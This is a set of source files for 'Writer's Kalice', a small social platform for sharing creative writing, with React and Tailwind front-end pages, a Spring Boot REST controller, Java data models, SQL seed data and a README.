className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Reports</a>
</div>
<div className="pt-4 pb-3 border-t border-gray-700">
<div className="flex items-center px-5 space-x-3" onClick={() => this.setState(state => ({ profileMenuOpen: !state.profileMenuOpen }))}>
<div className="flex-shrink-0">
<img className="h-10 w-10 rounded-full"
src="https://images.unsplash.com/photo-1472099645785-5658abf4ff4e?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=facearea&facepad=2&w=256&h=256&q=80"
alt="" />
</div>
<div className="space-y-1">
<div className="text-base font-medium leading-none text-white"><NAME></div>
<div className="text-sm font-medium leading-none text-gray-400"><EMAIL></div>
</div>
</div>
<div className="mt-3 px-2 space-y-1">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Your
Profile</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Settings</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Sign
out</a>
</div>
</div>
</div>
</nav>
<header className="bg-gray-800 shadow">
<div className="max-w-7xl mx-auto py-6 px-4 sm:px-6 lg:px-8">
<h1 className="text-3xl font-bold leading-tight text-white">
Write
</h1>
</div>
</header>
<main className="flex-grow">
<section className="text-gray-500 bg-gray-900 body-font relative">
<div className="container px-5 py-12 mx-auto">
<div className="flex flex-col text-center w-full mb-12">
<h1 className="sm:text-3xl text-2xl font-medium title-font mb-4 text-white">Scream out your genius!</h1>
<p className="lg:w-2/3 mx-auto leading-relaxed text-base">Markdown support is planned for the future. Also, feel free to drag down the text area to enlarge it for comfort!</p>
</div>
<div className="lg:w-full h-full md:w-full mx-auto">
<div className="flex flex-col flex-wrap -m-2">
<div className="p-2 w-full">
<input className="w-full bg-gray-900 rounded border border-gray-700 text-white focus:outline-none focus:border-indigo-800 text-base px-4 py-2" placeholder="Title" type="text" onChange={this.handleOptions} name="title" />
</div>
<div className="p-2 w-full">
<textarea className="w-full bg-gray-900 rounded border h-56 border-gray-700 text-white focus:outline-none focus:border-indigo-800 text-base px-4 py-2 block" placeholder="Content" onChange={this.handleOptions} name="content"></textarea>
</div>
</div>
</div>
<div className="grid grid-cols-2">
<div className="mt-10 block text-gray-400">
<p className="font-semibold text-lg mb-2 mt-2">Post Settings</p>
<div className="mt-2 text-gray-400">
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox form-checkbox-dark text-indigo-600" checked={this.state.anonymous} onChange={this.handleOptions} name="anonymous" />
<span className="ml-2 form text-gray-400 font-thin">Post anonymously</span>
</label>
</div>
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox form-checkbox-dark text-pink-500" checked={this.state.above_eighteen} onChange={this.handleOptions} name="above_eighteen" />
<span className="font-thin text-gray-400 ml-2">For 18+ audience</span>
</label>
</div>
<div className="p-2 w-full">
<button className="flex mx-auto text-white bg-indigo-600 border-0 py-2 px-10 focus:outline-none hover:bg-indigo-700 rounded text-lg"
onClick={this.handlePost}>Post</button>
</div>
</div>
</div>
<div className="mt-10 block text-gray-400">
<p className="font-semibold text-lg mb-1 mt-2">Add Tags</p>
<p className="text-hairline mb-3">Click on tags to toggle them. Filled tags are applied, and outlined ones are not.</p>
<div className="grid-flow-row">
<InterestChip text="Poetry" onOn={() => this.addTag('poetry')} onOff={() => this.removeTag('poetry')} />
<InterestChip text="Prose" onOn={() => this.addTag('prose')} onOff={() => this.removeTag('prose')} />
<InterestChip text="Short stories" onOn={() => this.addTag('short_stories')} onOff={() => this.removeTag('short_stories')} />
<InterestChip text="Idle thoughts" onOn={() => this.addTag('idle_thoughts')} onOff={() => this.removeTag('idle_thoughts')} />
<InterestChip text="Parody" onOn={() => this.addTag('parody')} onOff={() => this.removeTag('parody')} />
<InterestChip text="Jokes" onOn={() => this.addTag('jokes')} onOff={() => this.removeTag('jokes')} />
<InterestChip text="Nature" onOn={() => this.addTag('nature')} onOff={() => this.removeTag('nature')} />
</div>
</div>
</div>
</div>
</section>
</main>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto text-gray-500 bg-gray-900 flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}<file_sep>import React from 'react';
import './css/build/tailwind.css';
export default class Comment extends React.Component {
componentDidMount() {
console.log(this.props.anonymous);
}
render() {
return (
<div className="py-8 flex flex-wrap md:flex-no-wrap border-b-2 border-gray-800">
<div className="md:flex-grow">
<h2 className="text-lg font-medium text-white title-font mb-2"><span className="font-semibold">{this.props.anonymous ? '(anonymous)' : this.props.postedbyUsername}</span> says:</h2>
<p className="leading-relaxed text-gray-400">{this.props.content}</p>
</div>
</div>
);
}
}<file_sep>import React from 'react';
import logo from './public/assets/logo.png';
import './css/build/tailwind.css';
import PopupMenuList from './PopupMenuList';
import { Link } from 'react-router-dom';
import serverUrl from "./appconfig";
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import Post from './Post';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export default class ViewRequestsPage extends React.Component {
constructor(props) {
super(props);
this.state = {
posts: []
}
this.handleWrite = this.handleWrite.bind(this);
this.handleProfileSettings = this.handleProfileSettings.bind(this);
this.handleLogout = this.handleLogout.bind(this);
this.handleVR = this.handleVR.bind(this);
}
componentDidMount() {
fetch(serverUrl + "/users/getviewrequests?userId=" + window.localStorage.getItem("wKuid"), { method: 'GET' })
.then((respone) => respone.json())
.then((data) => {
console.log(data);
this.setState({
posts: data
});
});
}
handleWrite() {
console.log("Write");
window.setTimeout(() => this.props.history.push('/write'), 10);
}
handleProfileSettings() {
console.log("Profile Settings");
}
handleLogout() {
console.log("Logout");
}
handleVR() {
console.log("View requests");
}
render() {
return (
<div className="flex flex-col bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div className="flex items-center justify-between h-16">
<div className="flex items-center">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden md:block">
<div className="ml-10 flex items-baseline space-x-4">
<Link to="/feed">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
</Link>
<Link to="/savedPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Saved Posts</a>
</Link>
<Link to="/seenPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Seen Posts</a>
</Link>
</div>
</div>
</div>
<div className="hidden md:block">
<div className="ml-4 flex items-center md:ml-6">
{/*<button
className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700"
aria-label="Notifications">
<svg className="h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M15 17h5l-1.405-1.405A2.032 2.032 0 0118 14.158V11a6.002 6.002 0 00-4-5.659V5a2 2 0 10-4 0v.341C7.67 6.165 6 8.388 6 11v3.159c0 .538-.214 1.055-.595 1.436L4 17h5m6 0v1a3 3 0 11-6 0v-1m6 0H9" />
</svg>
</button>*/}
<button className="text-white bg-indigo-600 border-0 py-2 px-6 focus:outline-none hover:bg-indigo-700 rounded justify-center text-lg" onClick={this.handleWrite}>
Write
</button>
{/* Profile dropdown */}
<div className="ml-3 mt-1 relative">
<PopupMenuList name='User' onLogout={this.handleLogout} onVR={this.handleVR} onProfile={this.handleProfileSettings} />
</div>
</div>
</div>
<div className="-mr-2 flex md:hidden">
{/* Mobile menu button */}
<button
className="inline-flex items-center justify-center p-2 rounded-md text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:bg-gray-700 focus:text-white">
{/* Menu open: "hidden", Menu closed: "block" */}
<svg className="block h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M4 6h16M4 12h16M4 18h16" />
</svg>
{/* Menu open: "block", Menu closed: "hidden" */}
<svg className="hidden h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M6 18L18 6M6 6l12 12" />
</svg>
</button>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Open: "block", closed: "hidden"
*/}
<div className='hidden'>
<div className="px-2 pt-2 pb-3 space-y-1 sm:px-3">
<Link to="/feed">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-white bg-gray-900 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
</Link>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Team</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Projects</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Calendar</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Reports</a>
</div>
<div className="pt-4 pb-3 border-t border-gray-700">
<div className="flex items-center px-5 space-x-3" onClick={() => this.setState(state => ({ profileMenuOpen: !state.profileMenuOpen }))}>
<div className="flex-shrink-0">
<img className="h-10 w-10 rounded-full"
src="https://images.unsplash.com/photo-1472099645785-5658abf4ff4e?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=facearea&facepad=2&w=256&h=256&q=80"
alt="" />
</div>
<div className="space-y-1">
<div className="text-base font-medium leading-none text-white"><NAME></div>
<div className="text-sm font-medium leading-none text-gray-400"><EMAIL></div>
</div>
</div>
<div className="mt-3 px-2 space-y-1">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Your
Profile</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Settings</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Sign
out</a>
</div>
</div>
</div>
</nav>
<header className="bg-gray-800 shadow">
<div className="max-w-7xl mx-auto py-6 px-4 sm:px-6 lg:px-8">
<h1 className="text-3xl font-bold leading-tight text-white">
View Requests
</h1>
</div>
</header>
<main className="flex-grow">
<div className="max-w-7xl mx-auto py-6 sm:px-6 lg:px-8 bg-gray-900">
{/* Replace with your content */}
<section className="text-gray-500 bg-gray-900 body-font overflow-hidden">
<div className="container px-5 py-24 mx-auto">
<div className="flex flex-wrap -m-12">
{this.state.posts.map((post) => {
console.log(post);
return <Post content={post.content} title={post.title}
key={post.id}
id={post.id}
nPosReactions={post.nposReactions.toString()}
nNegReactions={post.nnegReactions.toString()}
nComments={post.ncomments.toString()} anonymous={post.anonymous}
postedbyUsername={post.postedbyUsername} viewReqType={true}
sentbyUsername={post.sentbyUsername}
tags={post.tags}
/>
}
)}
</div>
</div>
<div className="grid grid-cols-5 place-content-center h-48">
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
<button className="text-white bg-gray-700 border-0 py-2 px-8 focus:outline-none hover:bg-gray-800 rounded justify-center text-lg" onClick={this.handleProfileMenuOpen}>
More
</button>
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
<div className="text-gray-700 text-center px-4 py-2 m-2"></div>
</div>
</section>
{/* /End replace */}
</div>
</main>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
</div>
);
}
}<file_sep>package com.writerskalice.server.models.getmodels;
import lombok.*;
import java.util.ArrayList;
import java.sql.Date;
@Data
@AllArgsConstructor
@NoArgsConstructor
public class Post {
private Integer id;
private String title;
private String content;
private Integer nPosReactions;
private Integer nNegReactions;
private Integer nComments;
private Boolean anonymous;
private String postedbyUsername;
private ArrayList<String> tags;
private Date postedOn;
}<file_sep>package com.writerskalice.server.controllers;
import com.writerskalice.server.dao.PostRepository;
import com.writerskalice.server.dao.UserRepository;
import com.writerskalice.server.dao.ViewRequestRepository;
import com.writerskalice.server.models.postmodels.SetSeenData;
import com.writerskalice.server.models.deletemodels.ViewRequestSeenData;
import com.writerskalice.server.models.postmodels.*;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;
@RestController
@CrossOrigin(origins = "http://localhost:3000")
public class POSTController {
@Autowired
PostRepository postRepository;
@Autowired
UserRepository userRepository;
@Autowired
ViewRequestRepository viewRequestRepository;
@PostMapping("/users/checksignin")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> checkSignIn(@RequestBody SignInDetails details) {
try {
var res = userRepository.checkUserCreds(details.getUsername(), details.getPassword());
if (!((Boolean)res.get("success")))
throw new Exception();
else
return new ResponseEntity<>(res, HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.UNAUTHORIZED);
}
}
@PostMapping("/users/createuser")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> createUserAndProfile(@RequestBody CreateUserProfileData userProfileData) {
try {
var res = userRepository.createUserProfile(userProfileData);
if (!((Boolean)res.get("success")))
throw new Exception();
else
return new ResponseEntity<>(res, HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/users/updateprofiledata")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> updateUserProfile(@RequestBody UpdateProfileData updateProfileData) {
try {
var res = userRepository.updateUserProfile(updateProfileData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/users/sendviewrequest")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> sendViewRequest(@RequestBody SendViewRequestData sendViewRequestData) {
try {
var res = viewRequestRepository.sendViewRequest(sendViewRequestData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
if (e.getMessage().contains("view_requests_pk"))
return new ResponseEntity<>("{\"reason\":\"only_once\"}", HttpStatus.ALREADY_REPORTED);
else
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/commenton")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> commentOnPost(@RequestBody CreateCommentData commentData) {
try {
var res = postRepository.commentOnPost(commentData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/reacton")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> reactOnPost(@RequestBody ReactOnPostData reactionData) {
try {
var res = postRepository.reactOnPost(reactionData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
if (e.getMessage().contains("post_reactions_pk"))
return new ResponseEntity<>("{\"reason\":\"only_once\"}", HttpStatus.ALREADY_REPORTED);
else
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/createpost")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> createPost(@RequestBody CreatePostData postData) {
try {
var res = postRepository.createNewPost(postData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@DeleteMapping("/posts/setseen")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> setPostSeen(@RequestBody SetSeenData setSeenData) {
try {
var res = postRepository.setPostSeen(setSeenData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@PostMapping("/posts/savepost")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> setPostSaved(@RequestBody SavePostData savePostData) {
try {
var res = postRepository.addSavedPost(savePostData);
if (!res)
throw new Exception();
else
return new ResponseEntity<>(HttpStatus.OK);
}
catch (Exception e) {
e.printStackTrace();
if (e.getMessage().contains("saved_posts_pk"))
return new ResponseEntity<>("{\"reason\":\"only_once\"}", HttpStatus.ALREADY_REPORTED);
else
return new ResponseEntity<>(null, HttpStatus.NOT_MODIFIED);
}
}
@DeleteMapping("/posts/deleteviewrequest")
@CrossOrigin(origins = "http://localhost:3000")
public ResponseEntity<?> setViewReqSeen(@RequestBody ViewRequestSeenData vrSeenData) {
return new ResponseEntity<>(HttpStatus.OK);
}
}
<file_sep>-- Ranks
insert into ranks(description, num_stars) values
('Beginner', 0),
('Rookie', 1),
('Novice', 2),
('Intermediate', 3),
('Pro', 4),
('Expert', 5);
-- Privacy details
insert into privacy_details(show_interests, show_name, show_bio) values
(true, true, true), (true, true, false), (true, false, true), (true, false, false),
(false, true, true), (false, true, false), (false, false, true), (false, false, false);
-- Interest tags
insert into interest_tags(description) values
('poetry'), ('prose'), ('short_stories'), ('idle_thoughts'), ('parody'), ('jokes'), ('nature');
insert into interest_tags(description) values ('compositions');
-- Insert reactions
insert into reactions values
(1, 'Like', 'positive'),
(2, 'Dislike', 'negative');
-- For test:
truncate post_reactions;
insert into post_reactions values (2, 1, 1, false);
update profiles set npos_reacts = 0 where user_id = 2;<file_sep>module.exports = {
future: {
// removeDeprecatedGapUtilities: true,
// purgeLayersByDefault: true,
},
purge: [],
theme: {
customForms: theme => ({
dark: {
'input, textarea, multiselect, checkbox, radio': {
backgroundColor: theme('colors.gray.900'),
},
select: {
backgroundColor: theme('colors.gray.600'),
},
},
sm: {
'input, textarea, multiselect, select': {
fontSize: theme('fontSize.sm'),
padding: `${theme('spacing.1')} ${theme('spacing.2')}`,
},
select: {
paddingRight: `${theme('spacing.4')}`,
},
'checkbox, radio': {
width: theme('spacing.3'),
height: theme('spacing.3'),
},
}
}),
},
variants: {},
plugins: [
require('@tailwindcss/ui'),
require('@tailwindcss/custom-forms')
],
}
<file_sep># Writer's Kalice
## About
Project Writer's Kalice is an aim to create a social media platform exclusively for sharing creative writing compositions, poems, etc. and get feedback on it.
## Server-side
The server side uses Spring Boot along with PostgreSQL as its database management system.
## Client-side
The client side uses React and Tailwind CSS.
<file_sep>package com.writerskalice.server.models.getmodels;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import lombok.Setter;
import java.util.Date;
@AllArgsConstructor
@NoArgsConstructor
public class ViewRequestPost extends Post {
@Getter
@Setter
private String sentbyUsername;
/*@Getter
@Setter
private Date sentOn;*/
}<file_sep>import React from 'react';
import ReactDOM from 'react-dom';
import { Router, Route, Link, IndexRoute } from 'react-router-dom';
import { createBrowserHistory } from 'history';
import { TransitionGroup, CSSTransition } from 'react-transition-group';
import Landing from './App';
import SignUpPage from './SignUpPage';
import Feed from './Feed';
import NewPostPage from './NewPost';
import ProfileSettingsPage from './ProfileSettingsPage';
import ViewRequestsPage from './ViewRequestsPage';
import PostDisplayPage from './PostDisplayPage';
import * as serviceWorker from './serviceWorker';
import SavedPostsPage from './SavedPostsPage';
import SeenPostsPage from './SeenPostsPage';
const history = createBrowserHistory();
ReactDOM.render(
<React.StrictMode>
<Router history={history}>
<Route exact path="/" component={Landing} />
<Route path="/signup" component={SignUpPage} />
<Route path="/feed" component={Feed} />
<Route path="/write" component={NewPostPage} />
<Route path="/profileSettings" component={ProfileSettingsPage} />
<Route path="/viewRequests" component={ViewRequestsPage} />
<Route path="/post" component={PostDisplayPage} />
<Route path="/savedPosts" component={SavedPostsPage} />
<Route path="/seenPosts" component={SeenPostsPage} />
</Router>
</React.StrictMode>,
document.getElementById('root')
);
// If you want your app to work offline and load faster, you can change
// unregister() to register() below. Note this comes with some pitfalls.
// Learn more about service workers: https://bit.ly/CRA-PWA
serviceWorker.unregister();
<file_sep>import React from 'react';
import logo from './public/assets/logo.png';
import './css/build/tailwind.css';
import serverUrl from './appconfig';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import { useHistory } from 'react-router-dom';
import { tagToId } from './utils';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export class InterestTag extends React.Component {
constructor(props) {
super(props);
this.state = {
checked: false
};
this.handleCheck = this.handleCheck.bind(this);
this.handleUncheck = this.handleUncheck.bind(this);
}
handleCheck() {
this.setState(state => ({
checked: true,
}));
this.props.onCheck();
}
handleUncheck() {
this.setState({
checked: false,
});
this.props.onUncheck();
}
render() {
if (!this.state.checked) {
return (
<div className="xl:w-2/3 md:w-2/3 mt-2" onClick={this.handleCheck}>
<div className="border border-gray-300 font-sans hover:border-indigo-600 px-6 py-3 rounded-lg">
<h2 className="text-base text-gray-900 title-font">{this.props.itemText}</h2>
</div>
</div>
);
}
else {
return (
<div class="xl:w-2/3 md:w-2/3 mt-2" onClick={this.handleUncheck}>
<div class="bg-indigo-700 border border-indigo-700 hover:border-white px-6 py-3 rounded-lg">
<h2 class="text-base text-white title-font">{this.props.itemText}</h2>
</div>
</div>
);
}
}
}
class SignUpPage extends React.Component {
constructor(props) {
super(props);
this.state = {
isAboveEighteen: true,
showBio: true,
showName: true,
interestTags: [],
name: '',
username: '',
email: '',
password: '',
bio: '',
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleOptions = this.handleOptions.bind(this);
this.handleSubmit = this.handleSubmit.bind(this);
}
handleSubmit() {
console.log(this.state);
fetch(serverUrl + "/users/createuser", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: this.state.username,
password: <PASSWORD>,
name: this.state.name,
email: this.state.email,
bio: this.state.bio,
isAboveEighteen: this.state.isAboveEighteen,
showInterestTags: false,
showName: this.showName,
showBio: this.showBio,
tags: this.state.interestTags.map((tag) => tagToId(tag)),
})
}).then(response => {
if (response.status == 200) {
window.localStorage.setItem('wKusername', this.state.username);
window.localStorage.setItem('wKpassword', <PASSWORD>);
response.json().then((data) => {
console.log(data)
if (data.success) {
window.localStorage.setItem('wKuid', data.userId);
this.setState({
successText: 'Signed up successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);
}
else {
this.setState({
errorText: 'Could not sign up!',
failedSnkOpen: true,
});
}
});
}
else {
this.setState({
errorText: 'Sign up failed!',
failedSnkOpen: true,
});
}
});
/*this.setState({
successText: 'Signed up successfully!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);*/
}
addTag(interest) {
console.log(this.state.interestTags);
this.setState(state => {
const interestTags = state.interestTags.concat(interest);
return {
interestTags: interestTags
};
});
}
removeTag(interest) {
console.log(this.state.interestTags);
function arrayRemove(arr, value) {
return arr.filter(function (elem) {
return elem != value;
});
}
this.setState(state => ({
interestTags: arrayRemove(state.interestTags, interest)
}));
}
handleOptions(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
render() {
return (
<div className="flex flex-col bg-gray-800">
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-2 sm:px-6 lg:px-8">
<div className="relative flex items-center justify-between h-16">
<div className="absolute inset-y-0 left-0 flex items-center sm:hidden">
{/* Mobile menu button*/}
</div>
